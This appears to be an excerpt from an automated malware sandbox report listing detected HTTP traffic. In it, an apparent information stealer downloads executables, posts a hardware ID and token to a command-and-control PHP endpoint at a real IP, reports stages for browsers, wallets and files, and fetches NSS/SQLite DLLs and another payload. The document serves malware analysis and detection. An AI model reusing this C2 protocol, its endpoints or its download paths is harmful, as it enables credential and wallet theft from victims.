Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 09 Dec 2024 19:29:18 GMTServer: Apache/2.4.58 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 19:29:21 GMTContent-Type: application/octet-streamContent-Length: 2771456Last-Modified: Mon, 09 Dec 2024 19:01:00 GMTConnection: keep-aliveETag: "67573e6c-2a4a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 c0 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 2b 00 00 04 00 00 13 29 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 6c 72 6f 69 71 77 71 00 00 2a 00 00 a0 00 00 00 ea 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 77 65 6c 78 66 72 6b 00 20 00 00 00 a0 2a 00 00 04 00 00 00 24 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 c0 2a 00 00 22 00 00 00 28 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBFBFIIJDAKECAKKJEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 41 43 33 34 33 33 34 31 45 30 31 36 37 31 32 32 37 33 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 42 46 42 46 49 49 4a 44 41 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------EBFBFBFIIJDAKECAKKJEContent-Disposition: form-data; name="hwid"49AC343341E01671227304------EBFBFBFIIJDAKECAKKJEContent-Disposition: form-data; name="build"stok------EBFBFBFIIJDAKECAKKJE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHCHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 2d 2d 0d 0a Data Ascii: ------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="message"browsers------KECFCGHIDHCAKEBFCFHC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="message"plugins------AEBGIEGCFHCFHIDHIJEC--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCBFIJJECFIEBGDGCFIJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 46 49 4a 4a 45 43 46 49 45 42 47 44 47 43 46 49 4a 2d 2d 0d 0a Data Ascii: ------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="message"fplugins------HCBFIJJECFIEBGDGCFIJ--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJEHost: 185.215.113.206Content-Length: 8359Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKKFCFIIJJKKFHIEHJKHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHDBGHJKFIDHJJJEBHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 42 2d 2d 0d 0a Data Ascii: ------ECAFHDBGHJKFIDHJJJEBContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------ECAFHDBGHJKFIDHJJJEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------ECAFHDBGHJKFIDHJJJEBContent-Disposition: form-data; name="file"------ECAFHDBGHJKFIDHJJJEB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAFHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 2d 2d 0d 0a Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="file"------ECBKKKFHCFIDHIECGCAF--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECGIIIDAKJDHJKFHIEBHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCBHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="message"wallets------EGHJKFHJJJKJJJJKEHCB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBFHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 4a 45 42 4b 46 43 41 4b 4b 46 49 45 48 44 42 46 2d 2d 0d 0a Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="message"files------CAEHJEBKFCAKKFIEHDBF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIEHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 48 44 47 44 47 48 43 42 47 43 41 4b 46 49 49 49 45 2d 2d 0d 0a Data Ascii: ------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKEHDGDGHCBGCAKFIIIEContent-Disposition: form-data; name="file"------BKEHDGDGHCBGCAKFIIIE--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAFHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 65 34 65 64 66 36 39 34 62 39 32 30 62 31 30 65 34 30 64 65 38 61 66 30 37 63 62 65 38 38 35 33 38 36 34 62 38 36 61 64 66 63 36 34 33 31 64 35 66 39 30 30 30 30 32 61 61 35 35 36 35 62 31 65 39 38 32 33 33 33 66 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 2d 2d 0d 0a Data Ascii: ------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="token"ce4edf694b920b10e40de8af07cbe8853864b86adfc6431d5f900002aa5565b1e982333f------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="message"ybncbhylepme------EGIDHDGCBFBKECBFHCAF--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
